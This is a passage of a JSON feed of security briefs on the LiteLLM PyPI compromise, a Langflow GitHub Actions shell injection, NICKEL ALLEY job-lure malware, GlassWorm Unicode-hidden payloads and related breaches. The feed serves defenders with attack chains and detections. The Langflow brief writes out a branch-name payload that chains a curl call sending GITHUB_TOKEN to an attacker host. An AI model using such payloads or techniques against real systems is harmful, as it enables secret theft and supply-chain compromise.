2026, two malicious versions of the \u003ccode\u003elitellm\u003c/code\u003e package (versions 1.82.7 and 1.82.8) were discovered on the PyPI repository. These versions were found to contain automatically activated malware. The malicious code was designed to harvest sensitive credentials and files from systems where the compromised packages were installed. This supply chain attack follows a previous API token exposure stemming from a compromised trivy dependency, indicating a potential escalation in targeting the \u003ccode\u003elitellm\u003c/code\u003e project. The compromised packages exfiltrate stolen data to a remote API controlled by the attacker.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises the \u003ccode\u003elitellm\u003c/code\u003e PyPI package repository, likely leveraging exposed credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious code into versions 1.82.7 and 1.82.8 of the \u003ccode\u003elitellm\u003c/code\u003e package. The malicious code is automatically activated upon installation.\u003c/li\u003e\n\u003cli\u003eA user installs either \u003ccode\u003elitellm\u003c/code\u003e version 1.82.7 or 1.82.8 via \u003ccode\u003epip\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eUpon execution, the malicious code begins harvesting credentials and files accessible to the \u003ccode\u003elitellm\u003c/code\u003e environment. This may include API keys, tokens, and other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe malware establishes a network connection to a remote API server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe harvested credentials and files are exfiltrated to the attacker\u0026rsquo;s remote API server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to services and data protected by the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack directly impacts any user who installed the malicious \u003ccode\u003elitellm\u003c/code\u003e packages (versions 1.82.7 and 1.82.8). Successful credential harvesting allows attackers to pivot and compromise other systems and services accessible with the stolen credentials, potentially leading to data breaches, unauthorized access, and further lateral movement within victim environments. The number of affected users is currently unknown, but the popularity of \u003ccode\u003elitellm\u003c/code\u003e suggests a potentially wide impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately revoke and rotate any credentials accessible to environments where \u003ccode\u003elitellm\u003c/code\u003e versions 1.82.7 or 1.82.8 were installed (description).\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect installations of the affected \u003ccode\u003elitellm\u003c/code\u003e versions (Sigma rule).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections originating from \u003ccode\u003elitellm\u003c/code\u003e processes to external, untrusted APIs (network_connection).\u003c/li\u003e\n\u003cli\u003eImplement strong dependency management practices, including the use of software composition analysis tools, to identify and prevent the installation of malicious packages (overview).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T12:00:00Z","date_published":"2026-03-26T12:00:00Z","id":"/briefs/2026-03-litellm-supply-chain/","summary":"Compromised versions of the LiteLLM package (1.82.7 and 1.82.8) on PyPI contained malware designed to harvest sensitive credentials and files, exfiltrating them to a remote API, impacting users who installed and ran the package.","title":"Malicious LiteLLM Versions Harvest Credentials","url":"https://feed.craftedsignal.io/briefs/2026-03-litellm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","llm","trivy"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 24, 2026, reports surfaced indicating that the LiteLLM package, a library designed to provide a unified interface for interacting with various large language models, was compromised and injected with malicious code. This compromise occurred through a vulnerability in Trivy, a widely-used open-source vulnerability scanner. The malicious code was designed to steal credentials, potentially including API keys and other sensitive information used to access and manage language models. The scope of the compromise is currently unknown, but given the popularity of both LiteLLM and Trivy, the potential impact could be significant across various sectors using LLMs. This incident highlights the risks associated with supply chain vulnerabilities and the importance of thorough security audits of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA vulnerability is exploited within Trivy, potentially during its build or update process.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages this vulnerability to inject malicious code into the LiteLLM package during its build or release process.\u003c/li\u003e\n\u003cli\u003eUsers download and install the compromised LiteLLM package from the official repository (e.g., PyPI).\u003c/li\u003e\n\u003cli\u003eUpon execution of the infected LiteLLM package, the malicious code is triggered.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects credentials, such as API keys, environment variables, or configuration files, from the user\u0026rsquo;s system or environment.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are exfiltrated to a remote server controlled by the attacker using network protocols like HTTP/S.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access and control the victim\u0026rsquo;s accounts, resources, and data related to language model services.\u003c/li\u003e\n\u003cli\u003eThe attacker may further exploit the compromised systems for lateral movement, data exfiltration, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful compromise of the LiteLLM package can lead to significant damage, including unauthorized access to language model APIs, data breaches, and financial losses. The number of affected users and organizations is currently unknown. Sectors relying heavily on LLMs, such as AI development, research, and various industries integrating AI-powered applications, are particularly vulnerable. If successful, the attack can result in the exposure of sensitive data, disruption of services, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement integrity checks on all downloaded packages to verify their authenticity and prevent the installation of compromised versions (reference: overview).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious outbound connections originating from processes associated with the LiteLLM package, looking for connections to unknown or malicious IPs (reference: Attack Chain, step 6).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to detect potential credential theft and exfiltration attempts (reference: rules).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and least privilege principles to limit the impact of compromised credentials (reference: Impact).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of all third-party dependencies and use software composition analysis tools to identify and remediate vulnerabilities (reference: Overview).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-litellm-credential-theft/","summary":"The LiteLLM package was compromised and infected with credential-stealing code through a supply chain attack leveraging the Trivy vulnerability scanner.","title":"LiteLLM Package Compromised with Credential-Stealing Code via Trivy","url":"https://feed.craftedsignal.io/briefs/2026-03-litellm-credential-theft/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["shell-injection","github-actions","supply-chain"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eLangflow, a tool for building and deploying AI-powered agents and workflows, is vulnerable to a critical shell injection flaw in its GitHub Actions workflows. Discovered in versions prior to 1.9.0 and assigned CVE-2026-33475, the vulnerability stems from unsanitized interpolation of GitHub context variables (e.g., \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e) within the \u003ccode\u003erun:\u003c/code\u003e steps of various workflow files. By crafting malicious branch names or pull request titles, attackers can inject and execute arbitrary shell commands during CI/CD pipeline execution. Successful exploitation allows for the exfiltration of sensitive CI/CD secrets like \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, manipulation of infrastructure, and potential compromise of the software supply chain. The vulnerability was patched in version 1.9.0. This poses a significant risk to any public Langflow fork with GitHub Actions enabled.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker forks the Langflow repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new branch with a specially crafted name containing a shell injection payload, such as \u003ccode\u003einjection-test \u0026amp;\u0026amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker submits a pull request from the malicious branch to the main branch of the forked repository.\u003c/li\u003e\n\u003cli\u003eGitHub Actions is triggered to run the affected workflow (e.g., \u003ccode\u003edeploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWithin the workflow, the \u003ccode\u003erun:\u003c/code\u003e step attempts to use the unsanitized branch name via \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected shell command executes, sending the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e and can now authenticate to the GitHub API with the privileges of the affected workflow.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to push malicious code, create new releases, or tamper with other aspects of the software supply chain.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability allows for arbitrary code execution within the GitHub Actions CI/CD environment. A successful attack grants full access to CI secrets, potentially leading to the exfiltration of the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e. The attacker can then push malicious tags or container images, tamper with releases, or leak sensitive infrastructure data.  Given the nature of CI/CD pipelines, a compromise could have far-reaching effects on any project that depends on the affected Langflow repository or its forks. The number of potential victims is directly proportional to the number of Langflow forks with enabled GitHub Actions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to Langflow version 1.9.0 or later to patch CVE-2026-33475.\u003c/li\u003e\n\u003cli\u003eExamine GitHub Actions workflows for direct interpolation of GitHub context variables in \u003ccode\u003erun:\u003c/code\u003e steps, particularly those involving user-controlled values like branch names and pull request titles (e.g., in \u003ccode\u003e.github/workflows/deploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eImplement proper sanitization or quoting of untrusted inputs before using them in shell commands within GitHub Actions workflows.\u003c/li\u003e\n\u003cli\u003eAdopt the suggested fix of using environment variables and wrapping them in double quotes when referencing GitHub context variables within \u003ccode\u003erun:\u003c/code\u003e steps (as described in the overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Github Actions Shell Injection via Branch Name\u003c/code\u003e to identify potentially malicious branch names used in pull requests.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-langflow-shell-injection/","summary":"Unauthenticated remote shell injection vulnerability exists in Langflow GitHub Actions workflows prior to version 1.9.0, enabling attackers to execute arbitrary shell commands via malicious branch names or pull request titles due to unsanitized GitHub context variable interpolation, leading to potential secret exfiltration and supply chain compromise.","title":"Langflow GitHub Actions Shell Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/"},{"_cs_actors":["NICKEL ALLEY"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["NICKEL ALLEY","North Korea","cryptocurrency","supply-chain"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eNICKEL ALLEY, a threat group operating on behalf of the North Korean government, continues to target professionals in the technology sector using sophisticated social engineering tactics. Since at least mid-2025, the group has been observed creating fake LinkedIn company pages, GitHub repositories, and job opportunities to deceive prospective candidates and deliver malware. They employ tactics such as \u0026ldquo;ClickFix,\u0026rdquo; where victims are tricked into running malicious commands under the guise of fixing technical issues. Additionally, they\u0026rsquo;ve compromised npm package repositories and used typosquatting to distribute malicious packages. The group leverages cloud platforms like Vercel for payload hosting, tailoring malware delivery based on victim system configurations. This activity is primarily motivated by cryptocurrency theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Contact:\u003c/strong\u003e The attacker contacts a technology professional with a fake job opportunity, often advertised through LinkedIn or email.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFake Company Profile:\u003c/strong\u003e The attacker establishes credibility by creating a fake company profile on LinkedIn and/or GitHub.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalicious Repository:\u003c/strong\u003e The attacker creates a GitHub repository containing malicious code disguised as a software development project or crypto game (e.g., web3-social-platform).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eClickFix Delivery (PyLangGhost RAT):\u003c/strong\u003e During a fake interview process, the attacker instructs the victim to perform a \u0026ldquo;fix\u0026rdquo; by running a command which downloads and executes a VBScript file.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVBScript Execution:\u003c/strong\u003e The VBScript file (e.g., update.vbs, start.vbs) decompresses an archive (Lib.zip) containing library files and executes a renamed Python interpreter (csshost.exe) with a malicious Python script (nvidia.py).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBeaverTail Delivery (GitHub):\u003c/strong\u003e The victim is convinced to clone the GitHub repository and execute commands like \u003ccode\u003enpm install\u003c/code\u003e and \u003ccode\u003enpm start\u003c/code\u003e. The \u003ccode\u003eindex.js\u003c/code\u003e file retrieves the BeaverTail malware from a Base64-encoded URL hosted on Vercel.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalware Execution:\u003c/strong\u003e PyLangGhost RAT or BeaverTail malware executes on the victim\u0026rsquo;s system, enabling file exfiltration, arbitrary command execution, and system profiling.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Theft:\u003c/strong\u003e The malware targets browser credentials, cookies, and cryptocurrency wallet data, leading to financial theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eNICKEL ALLEY\u0026rsquo;s activities primarily target software developers and blockchain professionals. Successful attacks lead to the compromise of developer systems, theft of sensitive credentials, and exfiltration of cryptocurrency. The group\u0026rsquo;s persistent targeting of the technology sector highlights their continued focus on financial gain through cryptocurrency theft. Compromised systems can be used to further propagate attacks or to steal intellectual property.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003ewscript.exe\u003c/code\u003e launching VBScript files from the \u003ccode\u003e%TEMP%\u003c/code\u003e directory and followed by execution of renamed python.exe (csshost.exe) as described in the Attack Chain above. Deploy the Sigma rule \u003ccode\u003eDetect NICKEL ALLEY VBScript ClickFix\u003c/code\u003e to detect this activity.\u003c/li\u003e\n\u003cli\u003eInspect network connections from unusual processes (not browsers or standard networking tools) to newly registered domains or infrastructure providers like Vercel, using the \u003ccode\u003eDetect NICKEL ALLEY Outbound Connection\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eBlock access to the IOC domains \u003ccode\u003etalentacq[.]pro\u003c/code\u003e, \u003ccode\u003epublicshare[.]org\u003c/code\u003e, and \u003ccode\u003eastrabytesyncs[.]com\u003c/code\u003e at the DNS resolver.\u003c/li\u003e\n\u003cli\u003eEducate employees, especially those in software development, about social engineering tactics such as fake job opportunities and the ClickFix technique.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T10:25:17Z","date_published":"2026-03-25T10:25:17Z","id":"/briefs/2026-05-nickel-alley/","summary":"NICKEL ALLEY, a North Korean threat group, is targeting technology professionals with fake job opportunities and malicious code repositories to deliver malware like PyLangGhost RAT and BeaverTail, aiming to steal cryptocurrency.","title":"NICKEL ALLEY Targeting Developers with Fake Job Opportunities","url":"https://feed.craftedsignal.io/briefs/2026-05-nickel-alley/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","unicode-encoding"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe GlassWorm campaign, active since October 2025, targets software supply chains through malicious code concealed using Unicode variation selectors. This technique renders the payload virtually invisible in standard editors and code review processes. The attackers rotate extension IDs, npm package names, wallet addresses, and C2 infrastructure across multiple waves. A decoder component extracts the hidden bytes and executes them via \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e. The malware queries a Solana wallet to dynamically retrieve C2 URLs and proceeds to steal sensitive information, including \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, SSH keys (\u003ccode\u003eid_rsa\u003c/code\u003e, \u003ccode\u003eid_ed25519\u003c/code\u003e), and token environment variables such as \u003ccode\u003eNPM_TOKEN\u003c/code\u003e, \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, and \u003ccode\u003eOPEN_VSX_TOKEN\u003c/code\u003e. Wave 5, observed in March, compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages. Defenders relying solely on IOC-based detections may struggle to keep pace with the rapid evolution of this threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eMalicious code is injected into a software supply chain component (VS Code extension, npm package, etc.).\u003c/li\u003e\n\u003cli\u003eThe payload is encoded using Unicode variation selectors, rendering it nearly invisible.\u003c/li\u003e\n\u003cli\u003eThe victim installs or incorporates the compromised component into their development environment.\u003c/li\u003e\n\u003cli\u003eA decoder routine within the payload utilizes \u003ccode\u003ecodePointAt()\u003c/code\u003e with arithmetic against \u003ccode\u003e0xFE00/0xE0100\u003c/code\u003e to reconstruct the original bytecode.\u003c/li\u003e\n\u003cli\u003eThe decoded bytecode is executed using \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed code queries a Solana wallet using RPC methods (\u003ccode\u003egetTransaction\u003c/code\u003e, \u003ccode\u003egetSignaturesForAddress\u003c/code\u003e) to retrieve C2 URLs.\u003c/li\u003e\n\u003cli\u003eThe malware targets files such as \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, \u003ccode\u003eid_rsa\u003c/code\u003e, and \u003ccode\u003eid_ed25519\u003c/code\u003e for credential theft.\u003c/li\u003e\n\u003cli\u003eStolen credentials and token environment variables (\u003ccode\u003eNPM_TOKEN\u003c/code\u003e, \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, \u003ccode\u003eOPEN_VSX_TOKEN\u003c/code\u003e) are exfiltrated to the C2 server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe GlassWorm campaign has successfully compromised over 150 GitHub repositories, 72 Open VSX extensions, and 4 npm packages in Wave 5 alone. Successful attacks can lead to the theft of sensitive credentials, potentially granting attackers unauthorized access to code repositories, package management accounts, and other critical infrastructure. This, in turn, can enable further supply chain attacks or intellectual property theft.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the Unicode payload detection rule to identify suspicious densities of Unicode variation selector clusters in source code (see \u0026ldquo;Unicode Payload Detection\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eDeploy the decoder detection rule to flag code patterns that use \u003ccode\u003ecodePointAt()\u003c/code\u003e with specific arithmetic operations followed by \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eFunction()\u003c/code\u003e calls (see \u0026ldquo;GlassWorm Decoder Detection\u0026rdquo; rule below).\u003c/li\u003e\n\u003cli\u003eMonitor for network connections originating from non-blockchain applications using Solana RPC methods (\u003ccode\u003egetTransaction\u003c/code\u003e, \u003ccode\u003egetSignaturesForAddress\u003c/code\u003e), as described in the overview, to identify potential C2 activity.\u003c/li\u003e\n\u003cli\u003eImplement access controls and monitoring for sensitive files like \u003ccode\u003e.npmrc\u003c/code\u003e, \u003ccode\u003e.git-credentials\u003c/code\u003e, and SSH keys as described in the overview.\u003c/li\u003e\n\u003cli\u003eUse the \u003ccode\u003eglassworm-hunter\u003c/code\u003e tool linked in the references section to scan VS Code extensions, node_modules, pip site-packages, and git repos.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T14:30:00Z","date_published":"2026-03-24T14:30:00Z","id":"/briefs/2026-03-glassworm-supply-chain/","summary":"The GlassWorm campaign employs Unicode variation selectors to conceal malicious code within supply chain artifacts, subsequently querying a Solana wallet for C2 URLs and exfiltrating sensitive credentials.","title":"GlassWorm Supply Chain Attack Using Unicode Encoding and Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-glassworm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","pypi","litellm","compromise"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 24, 2026, versions 1.82.7 and 1.82.8 of the Litellm package, available on the Python Package Index (PyPI), were reported as compromised. This supply chain attack potentially affects thousands of users who may have updated to the malicious versions. The compromised packages could contain malicious code injected by an unknown threat actor. Users are advised to avoid updating to these versions and investigate their systems for potential compromise. The initial report came from a Reddit post and links to a blog post for further details.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eWhile the specifics of the attack chain are not fully detailed in the source, a typical supply chain attack targeting PyPI packages involves the following steps:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003ePackage Compromise:\u003c/strong\u003e Threat actor gains unauthorized access to the Litellm PyPI account or the build environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalicious Code Injection:\u003c/strong\u003e The attacker injects malicious code into the setup.py or other relevant files within the Litellm package. This malicious code could be designed to execute upon installation.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVersion Release:\u003c/strong\u003e The compromised versions, 1.82.7 and 1.82.8, are released to PyPI, making them available for users to download and install.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePackage Installation:\u003c/strong\u003e Users unknowingly download and install the compromised Litellm package using pip, triggering the execution of the injected malicious code.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The malicious code may establish a reverse shell, download additional payloads, or perform other actions to gain initial access to the victim\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence:\u003c/strong\u003e The attacker may establish persistence on the compromised system through various techniques, such as creating scheduled tasks or modifying startup scripts.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration/Malware Deployment:\u003c/strong\u003e Depending on the attacker\u0026rsquo;s objective, they may exfiltrate sensitive data, deploy ransomware, or perform other malicious activities.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The attacker may attempt to move laterally to other systems within the compromised network, escalating their access and expanding their reach.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of Litellm versions 1.82.7 and 1.82.8 could lead to widespread compromise of systems that use the package. The injected malicious code could enable attackers to steal sensitive information, deploy malware, or gain unauthorized access to victim systems. The number of affected users is estimated to be in the thousands. This incident highlights the risks associated with supply chain attacks targeting open-source software repositories.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately stop updating to Litellm versions 1.82.7 and 1.82.8.\u003c/li\u003e\n\u003cli\u003eRevert to a known-good version of Litellm prior to 1.82.7.\u003c/li\u003e\n\u003cli\u003eAnalyze network connections for suspicious traffic originating from systems where the compromised Litellm versions were installed, using network connection logs.\u003c/li\u003e\n\u003cli\u003eMonitor process creations for suspicious processes spawned from Python executables where Litellm is installed, using process creation logs and the Sigma rules provided below.\u003c/li\u003e\n\u003cli\u003eInvestigate systems where Litellm 1.82.7 or 1.82.8 were installed for any signs of compromise.\u003c/li\u003e\n\u003cli\u003eReview the blog post at \u003ca href=\"https://futuresearch.ai/blog/litellm-pypi-supply-chain-attack/\"\u003ehttps://futuresearch.ai/blog/litellm-pypi-supply-chain-attack/\u003c/a\u003e for further details on the compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:12:58Z","date_published":"2026-03-24T12:12:58Z","id":"/briefs/2024-01-litellm-compromise/","summary":"Versions 1.82.7 and 1.82.8 of the Litellm package on PyPI were compromised in a supply chain attack, potentially impacting numerous users, with recommendations to avoid updating to these versions.","title":"Compromised Litellm PyPI Package Versions","url":"https://feed.craftedsignal.io/briefs/2024-01-litellm-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","data-breach","credential-theft","phishing"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 23, 2026, a data breach was reported at Crunchyroll, stemming from a compromise of their outsourcing partner, Telus, in India. The attackers successfully gained access to Crunchyroll\u0026rsquo;s environment after a Telus employee was targeted with a spoofed phishing email. This email delivered malware that stole the employee\u0026rsquo;s Okta credentials, granting the attacker a foothold into Crunchyroll\u0026rsquo;s systems. The breach resulted in the exfiltration of approximately 100 GB of sensitive customer analytics and ticketing data. The threat actor had unauthorized access for a duration of 24 hours before the compromised credentials were revoked. This incident highlights the risks associated with supply chain vulnerabilities and the importance of robust security measures across all partner organizations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e A Telus employee received a spoofed phishing email containing malware. (T1566)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMalware Deployment:\u003c/strong\u003e The employee interacted with the phishing email, leading to the deployment of an infostealer on their machine.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Theft:\u003c/strong\u003e The malware captured the employee\u0026rsquo;s Okta credentials. (TA0006)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAuthentication:\u003c/strong\u003e The attacker used the stolen Okta credentials to authenticate into Crunchyroll\u0026rsquo;s environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Access:\u003c/strong\u003e Upon successful authentication, the attacker gained access to customer analytics and ticketing data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The attacker exfiltrated approximately 100 GB of data, including PII such as email addresses and IP addresses. (TA0010)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (Likely):\u003c/strong\u003e While not explicitly stated, the attacker likely performed some level of lateral movement within the Crunchyroll environment to access the data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eObjective Achieved:\u003c/strong\u003e The attacker successfully exfiltrated sensitive customer data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Crunchyroll data breach resulted in the exfiltration of 100 GB of customer analytics and ticketing data. This included personally identifiable information (PII) such as email addresses and IP addresses. The exposure of this data could lead to identity theft, phishing attacks targeting Crunchyroll customers, and potential financial fraud. The breach also damages Crunchyroll\u0026rsquo;s reputation and erodes customer trust. The incident underscores the critical need for robust security measures across the entire supply chain to protect sensitive customer data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement and enforce strict email security policies to prevent phishing attacks, focusing on employee training to recognize spoofed emails (T1566).\u003c/li\u003e\n\u003cli\u003eDeploy endpoint detection and response (EDR) solutions on all employee machines to detect and prevent malware deployment (TA0005).\u003c/li\u003e\n\u003cli\u003eMonitor Okta authentication logs for suspicious login activity, such as logins from unusual locations or at unusual times (TA0006).\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all user accounts, especially those with access to sensitive data, to mitigate the impact of credential theft (TA0006).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of all third-party vendors and partners to ensure they meet the required security standards (TA0011).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the use of stolen Okta credentials based on anomalous login patterns.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-crunchyroll-breach/","summary":"Crunchyroll suffered a data breach after a Telus employee was phished, leading to Okta credential theft and exfiltration of 100GB of customer data.","title":"Crunchyroll Data Breach via Telus Supply Chain Compromise","url":"https://feed.craftedsignal.io/briefs/2026-03-crunchyroll-breach/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","github-actions","ci/cd"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 23, 2026, Wiz.io reported a supply chain attack targeting the KICS (Keeping Infrastructure Configuration Secure) GitHub Action. The threat actor, identified as TeamPCP, successfully compromised the KICS GitHub Action, potentially impacting numerous organizations utilizing the action in their CI/CD pipelines. This incident highlights the risks associated with supply chain dependencies and the potential for malicious actors to inject malicious code into widely used software components. The KICS GitHub Action is used to scan infrastructure-as-code (IaC) files for security vulnerabilities, making its compromise a significant security concern. Organizations that used the compromised version of the action may have had their secrets exfiltrated, or their infrastructure configurations altered.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eDue to the limited information, the attack chain 